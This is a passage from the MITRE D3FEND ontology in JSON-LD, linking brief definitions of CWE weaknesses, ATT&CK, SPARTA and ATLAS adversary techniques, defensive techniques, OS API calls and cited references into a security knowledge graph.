          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nd3eeaa2e749f4c60be5e3353de039be7"
        }
      ]
    },
    {
      "@id": "_:Nd3eeaa2e749f4c60be5e3353de039be7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SuspendThread"
      }
    },
    {
      "@id": "d3f:CWE-585",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-585",
      "d3f:definition": "The product contains an empty synchronized block.",
      "rdfs:label": "Empty Synchronized Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1071"
      }
    },
    {
      "@id": "d3f:DriverLoadIntegrityChecking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DriverLoadIntegrityChecking"
      ],
      "d3f:authenticates": {
        "@id": "d3f:HardwareDriver"
      },
      "d3f:d3fend-id": "D3-DLIC",
      "d3f:definition": "Ensuring the integrity of drivers loaded during initialization of the operating system.",
      "d3f:kb-article": "## How it works\nThis technique can be accomplished in a number of ways:\n\n* A kernel level security agent installed on a host machine ensures that the driver associated with the agent is first in the initialization order. A dependent DLL associated with the driver is configured to be processed before other dependent DLLs and executes a number of operations to ensure the driver associated with the security agent is initialized first.\n\n* Kernel components can be signed by a certificate obtained by a third party to verify the source of the component and whether it has been modified. When signed, the component will include a signature block implemented as a hash value of the component header and can also include a certificate chain. The signature and certificate data are typically added before the kernel component is distributed to the public.\n\n\n## Considerations\n\n* The private keys to sign certificates as reputable companies have been stolen in the past -- in cases such as where certificates from Adobe, Realtek, and JMicron have been used to sign malicious executables. (Source: https://resources.infosecinstitute.com/cybercrime-exploits-digital-certificates/#gref)\n\n* Trusted Root Certificate Authorities have been compromised, yielding the ability to use the compromised keys to generate certificates with an arbitrary company name.\n\n* It may not be difficult for an attacker to start an organization which can obtain a signed certificate.\n\n* A root certificate authority (CA) whose certificate is trusted in the verification logic could generate incorrect certificates, if they are lax or have ulterior motives.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IntegrityAssuranceThroughEarlyLoadingInTheBootPhase_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-ProtectedComputingEnvironment_MicrosoftTechnologyLicensingLLC"
        }
      ],
      "rdfs:label": "Driver Load Integrity Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N5fa385ce489049c09d7599ff689bab64"
        }
      ]
    },
    {
      "@id": "_:N5fa385ce489049c09d7599ff689bab64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "d3f:DS0025",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Cloud Service (ATT&CK DS)"
    },
    {
      "@id": "d3f:filters",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x filters y: An technique or agent x removes some specified set of of entities from the content of a digital artifact y, by passing an artifact's content through a filter.  A filter is a device that removes something from whatever passes through it.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01461293-v"
      },
      "rdfs:label": "filters",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/03344588-n"
        },
        {
          "@id": "http://www.ontologyrepository.com/CommonCoreOntologies/Filter"
        }
      ],
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:isolates"
        }
      ]
    },
    {
      "@id": "d3f:InputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, an input device is a piece of equipment used to provide data and control signals to an information processing system such as a computer or information appliance. Examples of input devices include keyboards, mouse, scanners, digital cameras, joysticks, and microphones.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Input_device"
      },
      "rdfs:label": "Input Device",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:LocalResource"
        }
      ]
    },
    {
      "@id": "d3f:IMP-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0006",
      "d3f:definition": "Threat actors may attempt to steal the data that is being gathered, processed, and sent from the victim spacecraft. Many spacecraft have a particular purpose associated with them and the data they gather is deemed mission critical. By attempting to steal this data, the mission, or purpose, of the spacecraft could be lost entirely.",
      "rdfs:label": "Theft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Theft"
    },
    {
      "@id": "d3f:release-date",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x release-date y: The object x has the release-date y.",
      "rdfs:label": "release-date",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:d3fend-annotation"
        },
        {
          "@id": "owl:versionInfo"
        }
      ]
    },
    {
      "@id": "d3f:CWE-393",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-393",
      "d3f:definition": "A function or operation returns an incorrect return value or status code that does not indicate the true result of execution, causing the product to modify its behavior based on the incorrect result.",
      "rdfs:label": "Return of Wrong Status Code",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-684"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:GraphicalUserInterface",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphical user interface (GUI)  is a type of user interface that allows users to interact with electronic devices through graphical icons and visual indicators such as secondary notation, instead of text-based user interfaces, typed command labels or text navigation. GUIs were introduced in reaction to the perceived steep learning curve of command-line interfaces (CLIs), which require commands to be typed on a computer keyboard.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Graphical_user_interface"
      },
      "rdfs:label": "Graphical User Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:UserInterface"
      },
      "skos:altLabel": "GUI"
    },
    {
      "@id": "d3f:OSAPIUnloadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that removes a previously loaded module from memory.",
      "d3f:invokes": {
        "@id": "d3f:UnloadModule"
      },
      "rdfs:label": "OS API Unload Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N698d2c8986fd40e6ab9c185fe1527a03"
        }
      ]
    },
    {
      "@id": "_:N698d2c8986fd40e6ab9c185fe1527a03",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UnloadModule"
      }
    },
    {
      "@id": "d3f:CWE-571",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-571",
      "d3f:definition": "The product contains an expression that will always evaluate to true.",
      "rdfs:label": "Expression is Always True",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1022",
      "@type": "owl:Class",
      "d3f:attack-id": "T1022",
      "d3f:definition": "Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1560",
      "rdfs:label": "Data Encrypted",
      "rdfs:seeAlso": {
        "@id": "d3f:T1560"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:T0852",
      "@type": "owl:Class",
      "d3f:attack-id": "T0852",
      "d3f:definition": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.",
      "rdfs:label": "Screen Capture - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Screen Capture"
    },
    {
      "@id": "d3f:EX-0018",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0018",
      "d3f:definition": "The adversary inflicts physical effects on a satellite without mechanical contact, using energy delivered through the environment. Principal modalities are electromagnetic pulse (EMP), high-power laser (optical/thermal effects), and high-power microwave (HPM). These methods can be tuned for reversible disruption (temporary sensor saturation, processor upsets) or irreversible damage (component burnout, optics degradation), and may be executed from ground, airborne, or space platforms given line-of-sight and power/aperture conditions. Forensics are often ambiguous: signatures may resemble environmental phenomena or normal degradations, and confirmation of effect is frequently limited to what the operator observes in telemetry or performance loss.",
      "d3f:impairs": {
        "@id": "d3f:OTEmbeddedComputer"
      },
      "rdfs:label": "Non-Kinetic Physical Attack - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N968e2dff3f444dca8d6407c1596f9beb"
        }
      ],
      "skos:prefLabel": "Non-Kinetic Physical Attack"
    },
    {
      "@id": "_:N968e2dff3f444dca8d6407c1596f9beb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEmbeddedComputer"
      }
    },
    {
      "@id": "d3f:PrimaryStorage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:PageFrame"
        },
        {
          "@id": "d3f:ProcessSegment"
        }
      ],
      "d3f:definition": "Primary memory of a computer is memory that is wired directly to the processor, consisting of RAM and possibly ROM.  These terms are used in contrast to mass storage devices and cache memory (although we may note that when a program accesses main memory, it is often actually interacting with a cache).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.memorymanagement.org/glossary/m.html#term-main-memory"
      },
      "rdfs:label": "Primary Storage",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Computer_data_storage#Primary_storage"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Storage"
        },
        {
          "@id": "_:Nf8c2bf644913407a8c8f1c13449daf62"
        },
        {
          "@id": "_:N9202829c16944c52a7e51119dd42af98"
        }
      ]
    },
    {
      "@id": "_:Nf8c2bf644913407a8c8f1c13449daf62",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PageFrame"
      }
    },
    {
      "@id": "_:N9202829c16944c52a7e51119dd42af98",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:NetworkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkMapping"
      ],
      "d3f:d3fend-id": "D3-NM",
      "d3f:definition": "Network mapping encompasses the techniques to identify and model the physical layer, network layer, and data exchange layers of the organization's network and their physical location, and determine allowed pathways through that network.",
      "d3f:display-order": 3,
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "rdfs:label": "Network Mapping",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Network_topology"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N747a17d1db0648de97927ba8fdf72cf0"
        }
      ]
    },
    {
      "@id": "_:N747a17d1db0648de97927ba8fdf72cf0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:InternetDNSLookup",
      "@type": "owl:Class",
      "d3f:definition": "An internet Domain Name System (DNS) lookup is a DNS lookup made from a host on a network that is resolved after querying a DNS name server hosted on a different network.",
      "rdfs:label": "Internet DNS Lookup",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:CWE-402",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-402",
      "d3f:definition": "The product makes resources available to untrusted parties when those resources are only intended to be accessed by the product.",
      "d3f:synonym": "Resource Leak",
      "rdfs:label": "Transmission of Private Resources into a New Sphere ('Resource Leak')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:Reference-CatiaUAFPlugin",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.3ds.com/products-services/catia/products/no-magic/addons/uaf-plugin/"
      },
      "d3f:kb-abstract": "MagicDraw offers the most robust standards compliant [Unified Architecture Framework (UAF)], DoDAF 2.0, MODAF 1.2, NAF 3, and NAF 4 via a UAF standardized solution. And what's more, No Magic fully supports all architectural framework products ensuring you achieve project results. No Magic also leads the industry in usability and interoprability, ensuring that you avoid unnecessary cost, schedule and performance risk.",
      "d3f:kb-organization": "Dassault Systemes",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DataExchangeMapping"
        },
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "d3f:OperationalDependencyMapping"
        },
        {
          "@id": "d3f:OrganizationMapping"
        },
        {
          "@id": "d3f:ServiceDependencyMapping"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        }
      ],
      "d3f:kb-reference-title": "Catia UAF Plugin",
      "rdfs:label": "Reference - Catia UAF Plugin"
    },
    {
      "@id": "d3f:SystemStartupDirectory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system startup directory is a directory containing executable files or links to executable files which are run when the system starts.",
      "rdfs:label": "System Startup Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:SystemConfigurationInitResource"
        },
        {
          "@id": "d3f:SystemInitConfiguration"
        }
      ]
    },
    {
      "@id": "d3f:OTWriteCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Write or store data.",
      "rdfs:label": "OT Write Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessDataCommandEvent"
        },
        {
          "@id": "_:N9343574004464a9287a4fb3015cf5634"
        }
      ]
    },
    {
      "@id": "_:N9343574004464a9287a4fb3015cf5634",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:AML.T0047",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0047",
      "d3f:definition": "Adversaries may use a product or service that uses artificial intelligence under the hood to gain access to the underlying AI model.\nThis type of indirect model access may reveal details of the AI model or its inferences in logs or metadata.",
      "rdfs:label": "AI-Enabled Product or Service - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0047"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "AI-Enabled Product or Service"
    },
    {
      "@id": "d3f:REC-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005",
      "d3f:definition": "Adversaries seek to passively (and sometimes semi-passively) capture mission communications across terrestrial networks and RF/optical links to reconstruct protocols, extract telemetry, and derive operational rhythms. On networks, packet captures, logs, and flow data from ground stations, mission control, and cloud backends can expose service boundaries, authentication patterns, and automation. In the RF domain, wideband recordings, spectrograms, and demodulation of TT&C and payload links, spanning VHF/UHF through S/L/X/Ka and, increasingly, optical, enable identification of modulation/coding, framing, and beacon structures. Even when links are encrypted, metadata such as carrier plans, symbol rates, polarization, and cadence can support traffic analysis, timing attacks, or selective interference. Community capture networks and open repositories amplify the reach of a modest adversary.",
      "rdfs:label": "Eavesdropping - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Eavesdropping"
    },
    {
      "@id": "d3f:Reference-AdvancedDeviceMatchingSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10892951B2/"
      },
      "d3f:kb-abstract": "Disclosed is a device management system for discovery and management of components added to computer systems and sub-systems. The device management system provides for recognizing a newly added component, and determining if the newly added component is already a part of the system inventory. The newly added component is matched with a component currently on the system, based on at least one matching attribute. A point total is calculated for each match level and a final match score is provided. The match score is compared with an aggressiveness level to determine if a match does indeed exist.",
      "d3f:kb-author": "Rajneesh Jalan, Joseph M. Schmitt, and Marco Simoes",
      "d3f:kb-organization": "Device42 Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HardwareComponentInventory"
      },
      "d3f:kb-reference-title": "Advanced device matching system",
      "rdfs:label": "Reference - Advanced device matching system"
    },
    {
      "@id": "d3f:Reference-TPM2.0LibrarySpecification_TrustedComputingGroup,Incorporated",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://trustedcomputinggroup.org/resource/tpm-library-specification/"
      },
      "d3f:kb-abstract": "This specification defines the Trusted Platform Module (TPM) a device that enables trust in computing\nplatforms in general. It is broken into parts to make the role of each part clear. All parts are required in\norder to constitute a complete standard. For a complete definition of all requirements necessary to build a TPM, the designer will need to use the appropriate platform-specific specification to understand all of the requirements for a TPM in a specific application or make appropriate choices as an implementer. Those wishing to create a TPM need to be aware that this specification does not provide a complete picture of the options and commands necessary to implement a TPM. To implement a TPM the designer needs to refer to the relevant platform-specific specification to understand the options and settings required for a TPM in a specific type of platform or make appropriate choices as an implementer.",
      "d3f:kb-author": "Trusted Computing Group",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Trusted Computing Group, Incorporated",
      "d3f:kb-reference-of": {
        "@id": "d3f:TPMBootIntegrity"
      },
      "d3f:kb-reference-title": "TPM 2.0 Library Specification",
      "rdfs:label": "Reference - TPM 2.0 Library Specification - Trusted Computing Group, Incorporated"
    },
    {
      "@id": "d3f:AssetInventoryAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An asset inventory agent is a software tool which captures and transmits information about the devices on a network, including their hostnames, MAC addresses, software they may be running, etc.",
      "rdfs:label": "Asset Inventory Agent",
      "rdfs:seeAlso": {
        "@id": "https://www.ninjaone.com/blog/how-to-do-an-it-asset-inventory"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:PersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to maintain their foothold.",
      "d3f:enables": {
        "@id": "d3f:TA0003"
      },
      "rdfs:label": "Persistence Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N6aeff012790146499e96fb12ca3d1598"
        }
      ]
    },
    {
      "@id": "_:N6aeff012790146499e96fb12ca3d1598",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0003"
      }
    },
    {
      "@id": "d3f:CCI-002178_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of subjects based on organization-defined rules governing the timing of revocations of access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002178"
    },
    {
      "@id": "d3f:Resource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a system resource, or simply resource, is any physical or virtual component of limited availability within a computer system. Every device connected to a computer system is a resource. Every internal system component is a resource. Virtual system resources include files (concretely file handles), network connections (concretely network sockets), and memory areas. Managing resources is referred to as resource management, and includes both preventing resource leaks (releasing a resource when a process has finished using it) and dealing with resource contention (when multiple processes wish to access a limited resource).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:System_resource"
      },
      "rdfs:label": "Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:DeepConvolutionalGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DCG",
      "d3f:definition": "Deep Convolutional GAN (DCGAN) uses convolutional and convolutional-transpose layers in the generator and discriminator, respectively.",
      "d3f:kb-article": "## References\nAnalytics Vidhya. (2021). Deep Convolutional Generative Adversarial Network (DCGAN) for Beginners. [Link](https://www.analyticsvidhya.com/blog/2021/07/deep-convolutional-generative-adversarial-network-dcgan-for-beginners/)",
      "d3f:synonym": "DCGAN",
      "rdfs:label": "Deep Convolutional GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSynthesisGAN"
      }
    },
    {
      "@id": "d3f:BayesianModelCombination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BMC",
      "d3f:definition": "Bayesian model combination (BMC) is an algorithmic correction to Bayesian model averaging (BMA). Instead of sampling each model in the ensemble individually, it samples from the space of possible ensembles (with model weights drawn randomly from a Dirichlet distribution having uniform parameters)",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).\n\nShultz, K. M., & Peterson, L. E. (2011). Model-averaged confidence intervals for ensemble learning. In *International Joint Conference on Neural Networks* (pp. 2677-2684).  [Link](https://axon.cs.byu.edu/papers/Kristine.ijcnn2011.pdf).",
      "rdfs:label": "Bayesian Model Combination",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:NetworkDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the activity or state of network devices, such as Ethernet adapters, Wi-Fi modules, or virtual interfaces. These events highlight connectivity, configuration, or performance changes.",
      "rdfs:label": "Network Device Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateMailslotFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a special File Object called Mailslot.",
      "rdfs:label": "Windows NtCreateMailslotFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:T1433",
      "@type": "owl:Class",
      "d3f:attack-id": "T1433",
      "d3f:definition": "On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.002",
      "rdfs:label": "Access Call Log - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Access Call Log"
    },
    {
      "@id": "d3f:SystemApplicationCycleCount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system variable that tracks the number of times the controller has completed its main program loop (scan cycle) since startup or last reset.",
      "d3f:synonym": "Controller Cycle Count",
      "rdfs:comment": "In most controllers this is not a default tag rather something that should be programmed.",
      "rdfs:label": "System Application Cycle Count",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:CWE-626",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-626",
      "d3f:definition": "The product does not properly handle null bytes or NUL characters when passing data between different representations or components.",
      "rdfs:label": "Null Byte Interaction Error (Poison Null Byte)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-147"
        },
        {
          "@id": "d3f:CWE-436"
        }
      ]
    },
    {
      "@id": "d3f:T1410",
      "@type": "owl:Class",
      "d3f:attack-id": "T1410",
      "d3f:definition": "An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1638",
      "rdfs:label": "Network Traffic Capture or Redirection - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1638"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Network Traffic Capture or Redirection"
    },
    {
      "@id": "d3f:ProcessSelf-ModificationDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSelf-ModificationDetection"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Process"
      },
      "d3f:d3fend-id": "D3-PSMD",
      "d3f:definition": "Detects processes that modify, change, or replace their own code at runtime.",
      "d3f:kb-article": "## How it Works\nA security agent installed on the host machine intercepts API calls between a process and operating system. Intercepted API calls are then compared against attack signatures/patterns to identify API calls that modify executable memory or modify the entry point address of a suspended child process. Attack patterns include:\n\n* Executable code of a suspended child process removed from memory by one or more API calls.\n* New executable code injected and / or loaded into memory of a suspended child process by one or more API calls.\n* Executable code modified by one or more API calls.\n* Next instruction pointer value in memory modified by one or more API calls.\n\n## Considerations\nComparing loaded code segments of processes with what is expected to have been loaded from a file can result in false positives, due to legitimate uses of self-modification for decrypting or uncompressing code segments.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForProcessHollowingDetection_CarbonBlackInc"
      },
      "rdfs:label": "Process Self-Modification Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N3661f0e6c2bf4ad3ba5759710eb54e65"
        }
      ]
    },
    {
      "@id": "_:N3661f0e6c2bf4ad3ba5759710eb54e65",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:LinuxExecve",
      "@type": "owl:Class",
      "d3f:definition": "Executes a program by replacing the calling process with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments. The PID stays the same.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/execve.2.html"
      },
      "rdfs:label": "Linux Execve",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIExec"
      }
    },
    {
      "@id": "d3f:OTChangeDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that modifies existing data on a remote device.",
      "rdfs:label": "OT Change Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTWriteCommandEvent"
        },
        {
          "@id": "_:N8b5d2b13d05b481fb9f57f9afa7f1de8"
        }
      ]
    },
    {
      "@id": "_:N8b5d2b13d05b481fb9f57f9afa7f1de8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTChangeDataCommand"
      }
    },
    {
      "@id": "d3f:AML.T0011.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0011.001",
      "d3f:definition": "Adversaries may develop malicious software packages that when imported by a user have a deleterious effect.\nMalicious packages may behave as expected to the user. They may be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.",
      "rdfs:label": "Malicious Package - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0011.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0011"
      },
      "skos:prefLabel": "Malicious Package"
    },
    {
      "@id": "d3f:CWE-346",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-346",
      "d3f:definition": "The product does not properly verify that the source of data or communication is valid.",
      "rdfs:label": "Origin Validation Error",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-345"
        }
      ]
    },
    {
      "@id": "d3f:Semi-supervisedBoosting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSB",
